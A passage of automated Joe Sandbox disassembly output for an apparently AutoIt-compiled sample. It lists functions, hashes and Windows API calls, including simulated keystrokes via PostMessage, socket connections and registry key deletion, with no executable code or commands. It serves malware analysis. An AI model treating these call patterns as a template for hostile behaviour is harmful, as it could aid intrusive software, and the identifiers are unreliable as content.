                                                              • String ID: @
                                                              • API String ID: 3522835683-2766056989
                                                              • Opcode ID: a9440a0b2c825e2e671929c168f3d8ef1a3c6e90fba3b6066a28be5ae45c9419
                                                              • Instruction ID: 5012287a687a60197a9508148710a85b7bd9b8a14ae6b442ac1b96e38dcbf90c
                                                              • Opcode Fuzzy Hash: a9440a0b2c825e2e671929c168f3d8ef1a3c6e90fba3b6066a28be5ae45c9419
                                                              • Instruction Fuzzy Hash: 49619D75A006199FCB14EF99C8819AEBBB4FF59314F14806EE815AB351CB38AD45CF88
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00490F8C
                                                              • GetKeyboardState.USER32(?), ref: 00490FA1
                                                              • SetKeyboardState.USER32(?), ref: 00491002
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00491030
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0049104F
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00491095
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004910B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: d9f4b88b9589d88af0590ca14ca51289f9592f89e52bdd9523a787278dae87bc
                                                              • Instruction ID: a75f5f9ad4dcca62971fe9efd3a38b6e143fec8d191a211e140075d2e9c5d1ce
                                                              • Opcode Fuzzy Hash: d9f4b88b9589d88af0590ca14ca51289f9592f89e52bdd9523a787278dae87bc
                                                              • Instruction Fuzzy Hash: 215113605047D23EFF3246348C05BBBBEA96B06304F0885AAE1D8459E3C2DDECC9D759
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00490DA5
                                                              • GetKeyboardState.USER32(?), ref: 00490DBA
                                                              • SetKeyboardState.USER32(?), ref: 00490E1B
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00490E47
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00490E64
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00490EA8
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00490EC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 0195fdbb046c254981c742bc9c4da1fdbc4a02f4d8cb3564679b56c7f09e765b
                                                              • Instruction ID: 4a5ee3e947949bd3757bbdd3209144b7457c258604bdd4c56654a5780edc9580
                                                              • Opcode Fuzzy Hash: 0195fdbb046c254981c742bc9c4da1fdbc4a02f4d8cb3564679b56c7f09e765b
                                                              • Instruction Fuzzy Hash: F85116A05447D53DFF3287348C45B7B7FA95B06300F0889AEF1D8569C2C399AC88D758
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: 5fc0b3aaf1b51797906deaf62732c300c8f59141064af65726842188690111c7
                                                              • Instruction ID: 4fb9d42a043a3f30d3e26782b2eb7186272a3354bfdbf9b3e36d4a24838c9ea4
                                                              • Opcode Fuzzy Hash: 5fc0b3aaf1b51797906deaf62732c300c8f59141064af65726842188690111c7
                                                              • Instruction Fuzzy Hash: AD41A766C1011476CB11EBB588469CFB7B8AF45315F60896BE908E3222F738E749C79E
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0048D5D4
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0048D60A
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0048D61B
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0048D69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: ,,L$DllGetClassObject
                                                              • API String ID: 753597075-1523921096
                                                              • Opcode ID: 2874f49d8a31c27fa751d8fb05b92799712410cad7e6c20a8ff481bb29441fc2
                                                              • Instruction ID: 349aae52de480aa460380dd5ac828e1f768982ef7e7cb7ee11d629a544b569c0
                                                              • Opcode Fuzzy Hash: 2874f49d8a31c27fa751d8fb05b92799712410cad7e6c20a8ff481bb29441fc2
                                                              • Instruction Fuzzy Hash: 6441A4B1901208EFDB05EF54C884B9E7BA9EF44314F1185AEEC09AF245E7B4DD44CBA8
                                                              APIs
                                                                • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00493697,?), ref: 0049468B
                                                                • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00493697,?), ref: 004946A4
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004936B7
                                                              • _wcscmp.LIBCMT ref: 004936D3
                                                              • MoveFileW.KERNEL32(?,?), ref: 004936EB
                                                              • _wcscat.LIBCMT ref: 00493733
                                                              • SHFileOperationW.SHELL32(?), ref: 0049379F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 1377345388-1173974218
                                                              • Opcode ID: e2733c519779d9b65c96e0fedb00e9f6905b8e651c1af57af1e4d438c6f40fd2
                                                              • Instruction ID: 162e92b7f90164ee15853b1d964996f1752bc3e01d24eb23056e8e57bd9ab906
                                                              • Opcode Fuzzy Hash: e2733c519779d9b65c96e0fedb00e9f6905b8e651c1af57af1e4d438c6f40fd2
                                                              • Instruction Fuzzy Hash: 544162B1508344AECB61EF65C4419DFBBE8AF89385F00097FF499C3251EA38D689C75A
                                                              APIs
                                                              • _memset.LIBCMT ref: 004B72AA
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B7351
                                                              • IsMenu.USER32(?), ref: 004B7369
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004B73B1
                                                              • DrawMenuBar.USER32 ref: 004B73C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                              • String ID: 0
                                                              • API String ID: 3866635326-4108050209
                                                              • Opcode ID: ee36f042df1874f920b0bbb297afc327899e50cf4300c362a36cb73739dc0f45
                                                              • Instruction ID: a9a4f53620497e76308fa1f7498c97d3e85104f82c28078ee9c245bce8d4ce8b
                                                              • Opcode Fuzzy Hash: ee36f042df1874f920b0bbb297afc327899e50cf4300c362a36cb73739dc0f45
                                                              • Instruction Fuzzy Hash: D0412675A04208EFDB20DF60D884AEABBF8FB48350F14952AFD05A7351D734AD64EB64
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 004B0FD4
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004B0FFE
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004B10B5
                                                                • Part of subcall function 004B0FA5: RegCloseKey.ADVAPI32(?), ref: 004B101B
                                                                • Part of subcall function 004B0FA5: FreeLibrary.KERNEL32(?), ref: 004B106D
                                                                • Part of subcall function 004B0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 004B1090
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 004B1058
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 61c0abed08a93a8e6da0530a11321b67c3b893387271a684fe0f9d9921bb0bec
                                                              • Instruction ID: d4ecd12b5eb40bd1c66571d9cd27e4bd7114c3fca4b8a16b9ac38a0f82d530b3
                                                              • Opcode Fuzzy Hash: 61c0abed08a93a8e6da0530a11321b67c3b893387271a684fe0f9d9921bb0bec
                                                              • Instruction Fuzzy Hash: 2A312F71900109BFDB15AF94DC99EFFB7BCEF08300F40027AF505A2251D6745E899AB4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004B62EC
                                                              • GetWindowLongW.USER32(01225850,000000F0), ref: 004B631F
                                                              • GetWindowLongW.USER32(01225850,000000F0), ref: 004B6354
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004B6386
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004B63B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004B63C1
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004B63DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 0b0474097472c1cd17a8540c9be5e062173b0066a9e4de0bd3213eb651dee428
                                                              • Instruction ID: f4a4fc16ae4343ea887edb61cd75ff9491ae658b4dfc8c66c0d02394d14d32e8
                                                              • Opcode Fuzzy Hash: 0b0474097472c1cd17a8540c9be5e062173b0066a9e4de0bd3213eb651dee428
                                                              • Instruction Fuzzy Hash: 943137306041409FDB20DF18DC84FA537E1FB4A754F1A11BAFA058F2B1CB79A854CB69
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DB2E
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DB54
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0048DB57
                                                              • SysAllocString.OLEAUT32(?), ref: 0048DB75
                                                              • SysFreeString.OLEAUT32(?), ref: 0048DB7E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0048DBA3
                                                              • SysAllocString.OLEAUT32(?), ref: 0048DBB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: da34775877766735b572a9db42f43efcd8185900ce76160570483cceac7f3e52
                                                              • Instruction ID: 2187f6e717a7d66bbf3f6a0a9e2f5f7257932a774b8b25a39eb3472c40d66da1
                                                              • Opcode Fuzzy Hash: da34775877766735b572a9db42f43efcd8185900ce76160570483cceac7f3e52
                                                              • Instruction Fuzzy Hash: 91218336A01219AFDF10EFA9DC84CBF77ACEF09360B018536F918DB291D674AD458768
                                                              APIs
                                                                • Part of subcall function 004A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004A7DB6
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004A61C6
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A61D5
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004A620E
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 004A6217
                                                              • WSAGetLastError.WSOCK32 ref: 004A6221
                                                              • closesocket.WSOCK32(00000000), ref: 004A624A
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004A6263
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 910771015-0
                                                              • Opcode ID: 9dd0fe60330ecde91c020a93366e7f3bdb002be972a7610e8613161cf5a2bfa0
                                                              • Instruction ID: 8fa5419178266e0d5b24b8523b1937883fa3c5572b70ce1f1540798a2d5bc72e
                                                              • Opcode Fuzzy Hash: 9dd0fe60330ecde91c020a93366e7f3bdb002be972a7610e8613161cf5a2bfa0
                                                              • Instruction Fuzzy Hash: E931D531600108AFDF10AF64CC85FBE7BADEF55714F05416AFD0997291DB78AC088B69
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: d4bf5794819108ff6e71bae4b85fa806236548b2b1ce15169dd0de2ecad6944c
                                                              • Instruction ID: 242dfe45fa957fa74ba49fd0407f8c63b2298afabebb5cc2bcdeeab72c12fb07
                                                              • Opcode Fuzzy Hash: d4bf5794819108ff6e71bae4b85fa806236548b2b1ce15169dd0de2ecad6944c
                                                              • Instruction Fuzzy Hash: 22216A7220451166E220BA35AC02FAF7398EF59744F50483FFC4296152FB9C9D4AD3AD
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DC09
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DC2F
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0048DC32
                                                              • SysAllocString.OLEAUT32 ref: 0048DC53
                                                              • SysFreeString.OLEAUT32 ref: 0048DC5C
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0048DC76
                                                              • SysAllocString.OLEAUT32(?), ref: 0048DC84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 995f3ce5ca386c80d98d9bf14164a1060eb85196412dcd609994b8cdda6404d6
                                                              • Instruction ID: 0bc83bf6e5ffc0cba7bb0bffc23b1522e91ffc161a6c7958de31b8d47501958e
                                                              • Opcode Fuzzy Hash: 995f3ce5ca386c80d98d9bf14164a1060eb85196412dcd609994b8cdda6404d6
                                                              • Instruction Fuzzy Hash: C3215635A05204AFAB10FFA8DC89DAF77ECEB09360B108536F914CB2A1D674EC45D768
                                                              APIs
                                                                • Part of subcall function 00431D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00431D73
                                                                • Part of subcall function 00431D35: GetStockObject.GDI32(00000011), ref: 00431D87
                                                                • Part of subcall function 00431D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00431D91
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004B7632
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004B763F
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004B764A
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004B7659
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004B7665
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 7abca5646e21d3d0bdb54e74ac3324f859f89ebb22138531cb11af15f6914884
                                                              • Instruction ID: b3c9ed4db48d3dd1c6d2e27c67db438fde2f00afaa2f169563c5e8bcbf0f846d
                                                              • Opcode Fuzzy Hash: 7abca5646e21d3d0bdb54e74ac3324f859f89ebb22138531cb11af15f6914884
                                                              • Instruction Fuzzy Hash: 8811E6B1110119BFEF118F65CC85EE77F5DEF083A8F014115BB04A20A0CA76AC21DBA8
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00459AE6
                                                                • Part of subcall function 00453187: EncodePointer.KERNEL32(00000000), ref: 0045318A
                                                                • Part of subcall function 00453187: __initp_misc_winsig.LIBCMT ref: 004531A5
                                                                • Part of subcall function 00453187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00459EA0
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00459EB4
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00459EC7
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00459EDA
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00459EED
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00459F00
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00459F13
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00459F26
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00459F39
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00459F4C
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00459F5F
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00459F72
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00459F85
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00459F98
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00459FAB
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00459FBE
                                                              • __mtinitlocks.LIBCMT ref: 00459AEB
                                                              • __mtterm.LIBCMT ref: 00459AF4
                                                                • Part of subcall function 00459B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00459AF9,00457CD0,004EA0B8,00000014), ref: 00459C56
                                                                • Part of subcall function 00459B5C: _free.LIBCMT ref: 00459C5D
                                                                • Part of subcall function 00459B5C: DeleteCriticalSection.KERNEL32(02O,?,?,00459AF9,00457CD0,004EA0B8,00000014), ref: 00459C7F
                                                              • __calloc_crt.LIBCMT ref: 00459B19
                                                              • __initptd.LIBCMT ref: 00459B3B
                                                              • GetCurrentThreadId.KERNEL32 ref: 00459B42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 46dbff05e0bcdf8e580b5fcd30c8b4e07bad482868155a39d0428612696fdd47
                                                              • Instruction ID: 2ae62426222ec65429b25f5d532d94faf8bb2169e9bb1a34f65c9db9f5bb1b28
